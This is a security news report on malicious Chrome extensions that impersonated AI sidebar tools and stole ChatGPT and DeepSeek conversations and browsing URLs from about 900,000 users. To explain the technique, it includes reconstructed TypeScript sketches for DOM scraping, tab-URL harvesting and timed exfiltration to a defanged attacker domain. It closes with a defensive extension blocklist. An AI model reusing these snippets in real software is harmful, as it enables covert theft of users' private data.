ChatGPT Data Theft Exposes 900,000 Chrome Users

Cybersecurity researchers have uncovered a large-scale data theft operation involving malicious Chrome browser extensions that silently harvested ChatGPT and DeepSeek conversations from more than 900,000 users. The affected extensions were distributed through the official Chrome Web Store and masqueraded as legitimate AI productivity tools, giving attackers persistent access to sensitive user data without obvious warning signs.

The incident highlights a growing risk tied to browser extensions and the increasing value of AI chat data, which often contains proprietary code, confidential business discussions, legal research, and personal information. While the attack did not involve a breach of OpenAI or DeepSeek systems themselves, it exploited the browser layer where user trust is often misplaced.

Affected Chrome Extensions

Researchers identified two Chrome extensions at the center of the campaign:

  1. Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI
    Extension ID: fnmihdojmnkclgjpcoonokmkhjpjechg
    Approximate users: 600,000
  2. AI Sidebar with Deepseek, ChatGPT, Claude, and more
    Extension ID: inhcgfpbfdjbjogdfjbclgolkmhnooop
    Approximate users: 300,000

Together, the extensions amassed more than 900,000 installs. One of them was even granted a “Featured” badge by Google at one point, increasing its visibility and the trust users placed in it. Both are striking examples of how malicious software can thrive inside official marketplaces.

How ChatGPT Chat Data Was Stolen

Once installed, the extensions requested permission to collect what they described as anonymous or non-identifiable analytics data. In practice, these permissions granted broad access to website content, browser tabs, and user activity.
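
As a rough illustration, the kind of manifest a data-harvesting extension might declare could look like the sketch below. The actual manifests of the malicious extensions were not published; this is a hypothetical reconstruction, shown as a TypeScript object (typed via @types/chrome) rather than raw manifest.json.

```typescript
// Hypothetical reconstruction of the permissions such an extension might
// declare. None of these values come from the malicious extensions' actual
// manifests, which were not published.
const manifest: chrome.runtime.ManifestV3 = {
  manifest_version: 3,
  name: "AI Sidebar",
  version: "1.0.0",
  // "tabs" exposes the URL of every open tab; "storage" and "alarms"
  // support local batching and timed exfiltration.
  permissions: ["tabs", "storage", "alarms"],
  // Host access to the AI chat sites lets a content script read page content.
  host_permissions: ["*://chatgpt.com/*", "*://chat.deepseek.com/*"],
  content_scripts: [
    {
      matches: ["*://chatgpt.com/*", "*://chat.deepseek.com/*"],
      js: ["content.js"],
    },
  ],
  background: { service_worker: "background.js" },
};
```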

After consent was given, the extensions actively monitored open browser tabs and checked whether users were visiting ChatGPT or DeepSeek. When a supported AI chat page was detected, the malware scanned the page’s structure and extracted both user prompts and AI-generated responses directly from the Document Object Model (DOM).
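
A minimal sketch of that technique follows. The selector and storage key are assumptions for illustration; the report did not publish the extensions’ actual source, and a real chat UI’s markup may differ.

```typescript
// content.ts — illustrative DOM scraping on an AI chat page.
// TURN_SELECTOR is an assumed selector; real malware would target whatever
// attributes the live chat markup actually exposes.
const TURN_SELECTOR = "[data-message-author-role]";

function scrapeConversation(): { role: string; text: string }[] {
  return Array.from(document.querySelectorAll(TURN_SELECTOR)).map((el) => ({
    role: el.getAttribute("data-message-author-role") ?? "unknown",
    text: (el as HTMLElement).innerText,
  }));
}

// Re-scrape as new messages stream in, staging results for later upload.
const observer = new MutationObserver(() => {
  chrome.storage.local.set({ pendingChats: scrapeConversation() });
});
observer.observe(document.body, { childList: true, subtree: true });
```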

The stolen conversations were stored locally and transmitted in batches to attacker-controlled servers at regular intervals, typically every 30 minutes. This process allowed the extensions to quietly siphon large volumes of chat data without noticeable performance impact or visible alerts.
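
In a Manifest V3 service worker, such timed batching might look like the sketch below. Only the 30-minute interval and the destination domain come from the report (the URL is left defanged); the /collect path, payload shape, and base64 “encoding” are assumptions.

```typescript
// background.ts — sketch of timed batch exfiltration.
const ENDPOINT = "https://deepaichats[.]com/collect"; // defanged; path assumed

chrome.alarms.create("sync", { periodInMinutes: 30 });

chrome.alarms.onAlarm.addListener(async (alarm) => {
  if (alarm.name !== "sync") return;
  const { pendingChats } = await chrome.storage.local.get("pendingChats");
  if (!pendingChats?.length) return;
  // Encode the batch so traffic resembles innocuous analytics telemetry.
  const body = btoa(JSON.stringify(pendingChats));
  await fetch(ENDPOINT, { method: "POST", body });
  await chrome.storage.local.remove("pendingChats");
});
```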

In parallel, the extensions collected full URLs from all open Chrome tabs. This browsing data could expose search queries, internal corporate dashboards, authentication parameters, private documentation portals, and other sensitive activity unrelated to AI chats.
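
With the "tabs" permission, collecting every open tab’s URL takes only a few lines; a sketch:

```typescript
// Harvest the URL of every open tab. Requires only the "tabs" permission;
// no access to page content is needed.
async function collectTabUrls(): Promise<string[]> {
  const tabs = await chrome.tabs.query({});
  return tabs.map((t) => t.url ?? "").filter(Boolean);
}
```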

A key part of the operation involved impersonation. The malicious extensions closely mirrored the design, description, and behavior of a legitimate AI sidebar extension developed by AITOPIA, which itself has around one million users. By copying interface elements and referencing AITOPIA in privacy policies, the attackers created a convincing façade that lowered suspicion and increased installation rates.

While AITOPIA’s legitimate extension discloses that chats processed through its own sidebar may be stored on company servers, it does not scrape conversations directly from ChatGPT or DeepSeek web sessions. The malicious extensions retained the familiar interface but added hidden data exfiltration routines that operated entirely in the background.

Command-and-Control Infrastructure

Researchers traced the exfiltrated data to multiple attacker-controlled domains, including deepaichats[.]com and chatsaigpt[.]com. These servers received AI chat content and browsing data in encoded form, allowing attackers to aggregate and analyze stolen information at scale.

Additional infrastructure, such as privacy policy pages and uninstall redirection sites, was hosted using the Lovable AI web development platform. Investigators believe this approach was intentionally used to complicate attribution and slow down takedown efforts by spreading components across third-party services.

Scope and Potential Impact

The scope of exposure is significant. AI conversations frequently include highly sensitive material, such as proprietary source code, internal architecture discussions, strategic planning notes, legal analysis, medical inquiries, and personally identifiable information shared in confidence with chatbots.

Combined with detailed browsing histories, the stolen data could be leveraged for corporate espionage, targeted phishing campaigns, identity theft, or resale on underground marketplaces. Organizations whose employees installed the affected extensions may have unknowingly exposed internal systems, intellectual property, customer information, and confidential research.

Security researchers warn that browser-based data theft of this nature is particularly dangerous because it bypasses many traditional security controls. The activity occurs inside a trusted user environment and does not rely on exploiting server-side vulnerabilities.

Google’s Response

The malicious extensions were reported to Google in late December 2025. At the time of disclosure, both extensions were still available on the Chrome Web Store, although one had its Featured status removed. Google acknowledged receiving the reports and stated that the matter was under review.

As of publication, Google had not publicly disclosed enforcement actions or clarified how the extensions passed review while engaging in extensive data exfiltration. The incident raises renewed questions about extension vetting processes and the effectiveness of marketplace safeguards.

What Users Should Do

Users who installed either extension are strongly advised to remove them immediately. Extensions can be reviewed and uninstalled by entering chrome://extensions in the browser’s address bar.

Users should also audit browser permissions and avoid installing extensions that request broad access to website content unless absolutely necessary. Even extensions that appear popular, well-reviewed, or featured should be treated with caution.

Organizations should consider restricting browser extension installation through policy controls and educating employees about the risks associated with AI tools and browser-based integrations.
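
For example, managed Chrome deployments can block the two reported extension IDs with the ExtensionInstallBlocklist enterprise policy. A minimal sketch follows, written as a TypeScript object mirroring the JSON policy file (on Linux, such files live under /etc/opt/chrome/policies/managed/; Windows and macOS use registry keys or configuration profiles instead).

```typescript
// Sketch of a Chrome enterprise policy blocking the two reported IDs.
const policy = {
  ExtensionInstallBlocklist: [
    "fnmihdojmnkclgjpcoonokmkhjpjechg", // Chat GPT for Chrome ...
    "inhcgfpbfdjbjogdfjbclgolkmhnooop", // AI Sidebar with Deepseek ...
  ],
  // Stricter alternative: block everything ("*") and allowlist only
  // vetted extensions via ExtensionInstallAllowlist.
};
```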

This incident underscores a broader shift in the threat landscape. As AI tools become deeply embedded in daily workflows, the conversations users have with chatbots are emerging as a high-value target. Browser extensions sit at a powerful intersection between users and web applications, and when abused, they provide attackers with trusted, persistent access to some of the most sensitive data users generate.

For more reporting on browser-based threats and AI data security, explore the latest updates in the artificial intelligence and cybersecurity sections.

Sean Doyle

Sean is a tech author and security researcher with more than 20 years of experience in cybersecurity, privacy, malware analysis, analytics, and online marketing. He focuses on clear reporting, deep technical investigation, and practical guidance that helps readers stay safe in a fast-moving digital landscape. His work continues to appear in respected publications, including articles written for Private Internet Access. Through Botcrawl and his ongoing cybersecurity coverage, Sean provides trusted insights on data breaches, malware threats, and online safety for individuals and businesses worldwide.
